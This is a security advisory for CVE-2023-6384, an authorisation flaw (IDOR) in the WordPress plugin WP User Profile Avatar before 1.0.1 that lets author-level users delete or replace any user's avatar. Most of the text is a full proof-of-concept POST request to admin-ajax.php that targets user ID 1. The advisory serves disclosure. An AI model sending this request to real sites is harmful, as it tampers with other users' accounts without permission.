WP User Profile Avatar < 1.0.1 – Author+ Avatar Deletion/Update via IDOR | CVE 2023-6384

Description

The plugin does not properly check for authorisation, allowing authors to delete and update arbitrary avatar

Proof of Concept

POC request:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------49182745140183315063494246849
Content-Length: 472
Origin: http://your_site
DNT: 1
Connection: close
Referer: http://your_site/wordpress/?p=873
Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7C882ae66f7e5369755c66cd9a37b12ea93849faebf221f391f6dca1b56fd21b4d; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1699414980%7CyeHq6S6Ycak8JS53S82IfXyC91VGKkxL57fd6Vv4sFA%7Ce163e2d4c1042710f9b0e475c500335e17ced7d7e00dfe867bf8af68d95e1e6b; wp-settings-2=libraryContent%3Dbrowse%26hidetb%3D0%26editor%3Dtinymce; wp-settings-time-2=1699242180
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="action"

remove_user_avatar # here you can add update_user_avatar and change avatar of user by id from AUTHOR account
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="form_data"

wpupa_url=&wpupa_attachment_id=875&user_id=1
-----------------------------49182745140183315063494246849
Content-Disposition: form-data; name="security"

3f855e1991
-----------------------------49182745140183315063494246849--